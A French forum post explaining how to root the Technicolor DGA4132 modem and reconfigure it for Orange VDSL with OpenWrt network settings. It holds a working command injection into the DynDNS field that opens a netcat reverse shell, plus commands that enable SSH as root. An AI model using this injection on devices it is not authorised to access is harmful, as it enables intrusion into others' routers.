Bonjour,
on vient de trouver une faille dans l'interface web du technicolor
DGA4132 qui permet de le rooter.
Le DGA4132 c'est le tout dernier modem/routeur xDSL de l'opérateur italien TIM, il est muni d'un port
SFP:
https://www.hwupgrade.it/forum/showthread.php?t=2823001il est préfconfiguré pour fonctionner qu'avec l'opérateur TIM, mais une fois qu'on a pris le Control, on fait ce qu'on veut, c'est de l'openwrt dedans
Chipset:
BroadCom 63138 (ARM A9 Dual Core 1GHz)*
Wi-Fi: Quantenna QT3840BC + QT25188*
2.4 GHz 300 Mbps (2x2 MIMO) IEEE 802.11n AP - 20/40 MHz
5 GHz 1733 Mbps (4x4 MU-MIMO) IEEE 802.11ac AP - 20/40/80 MHz - beamforming
Port USB: 2 x 3.0
Port LAN: 4 x Gbit, dont un WAN ou LAN
Port SFP pour FTTH
on le trouve à
48€ sur Ebay et Amazon :
https://www.amazon.fr/Modem-routeur-ADSL2-jusquà-000-mégaoctets/dp/B00AT8MKYC
Pour le rooter il suffit d'aller dans
Wan serviceset dans le champ du domaine dyndns, mettre :
test.com;nc 192.168.1.10 1337 -e /bin/sh &192.168.1.10 etant l'ip de votre PC
1337 le port à utiliser
Sur son PC, il faudra lancer auparavant dans un shell la commande :
nc -lvvp 1337et hop on a l'accés root
Donc une fois ceci fait on va activer SSH :
sed -i 's/0/1/' /etc/config/dropbear
sed -i 's/off/on/' /etc/config/dropbear
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd
puis on relance dropbear :
/etc/init.d/dropbear restart
Voilà, on peut maintenant accéder au modem/router en SSH, avec le user/pass :
root/rootIl ne reste plus qu'à paramétrer son
/etc/config/network pour le réseau Orange (remplacer les xxxxx et les zzzzzz avec vos données):
config interface 'loopback'
option ifname 'lo'
option proto 'static'
option ipaddr '127.0.0.1'
option netmask '255.0.0.0'
config globals 'globals'
option default_ps '0'
config device 'waneth4'
option type '8021q'
option name 'waneth4'
option macaddr 'xx:xx:xx:xx:xx:xx'
option ifname 'eth4'
option vid '835'
option ipv6 '0'
config device 'wanptm0'
option type '8021q'
option name 'wanptm0'
option macaddr 'xx:xx:xx:xx:xx:xx'
option vid '832'
option mtu '1500'
option ipv6 '0'
config interface 'wan'
option ifname 'ptm0.832'
option proto 'dhcp'
option peerdns '1'
option broadcast '1'
option vendorid 'sagem'
option reqopts '1 3 6 15 28 51 58 59 90 119 120 125'
option sendopts '0x4d:2b46535644534c5f6c697665626f782e496e7465726e65742e736f66746174686f6d652e4c697665626f7834 0x5a:0000000000000000000000zzzzzzzzzzzzzzzzzzzzzz'
option mtu '1500'
option auto '1'
option ipv6 '0'
config interface 'replay'
option ifname 'ptm0.838'
option proto 'dhcp'
option peerdns '1'
option broadcast '1'
option vendorid 'sagem'
option reqopts '1 3 42 72 121'
option sendopts '0x4d:2746535644534c5f6c697665626f782e4d4c54562e736f66746174686f6d652e4c697665626f7834 0x3d:01xxxxxxxxxxxx'
option mtu '1500'
config interface 'tvorange'
option proto 'static'
option ifname 'ptm0.840'
option ipaddr '192.168.255.254'
option netmask '255.255.255.255'
option gateway '192.168.255.254'
config interface 'wwan'
option proto 'mobiled'
option session_id '0'
option profile '1'
option auto '0'
config interface 'wan6'
option proto 'dhcpv6-pd'
option noslaaconly '1'
option iface_464xlat '0'
option dns_metric '20'
option auto '1'
option ifname '@wan_ipv6'
config interface 'lan'
option type 'bridge'
option proto 'static'
option ipaddr '192.168.1.1'
option netmask '255.255.255.0'
option force_link '0'
option ifname 'eth0 eth1 eth2 eth3 eth5'
list pppoerelay 'wanptm0'
option mtu '1500'
option ip6assign '0'
option ipv6 '0'
config switch 'bcmsw'
option reset '1'
option enable_vlan '0'
option qosimppauseenable '0'
option jumbo '1'
config interface 'wlnet_b_24'
option proto 'static'
option ip6assign '64'
option ip6hint '1'
option netmask '255.255.255.128'
option ipaddr '192.168.168.1'
option ifname 'wl0_1'
option force_link '0'
option name 'Guest24'
option ipv6 '0'
config interface 'wlnet_b_5'
option proto 'static'
option ip6assign '64'
option ip6hint '2'
option netmask '255.255.255.128'
option ipaddr '192.168.168.129'
option ifname 'wl1_1'
option force_link '0'
option name 'Guest50'
option ipv6 '0'
config device 'wlnet_b_5eth5'
option type '8021q'
option name 'wl1_1'
option enabled '1'
option ifname 'eth5'
option vid '3'
option ipv6 '0'
config interface 'sfp'
option proto 'static'
option ipaddr '192.168.2.2'
option netmask '255.255.255.128'
option ifname 'eth4'
À noter que moi je suis en VDSL, je n'utilise donc pas le port SFP.
Ensuite il suffit de suivre le tuto pour LEDE/Openwrt pour le firewall etc...
https://lafibre.info/remplacer-livebox/remplacement-de-la-livebox-par-un-routeur-lede-fork-dopenwrt/msg471749/#msg471749Donc avec ca on a moyen d'avoir NET + TV + Replay. et probablement la téléphonie car on peut faire tourner asterisk dessus ?!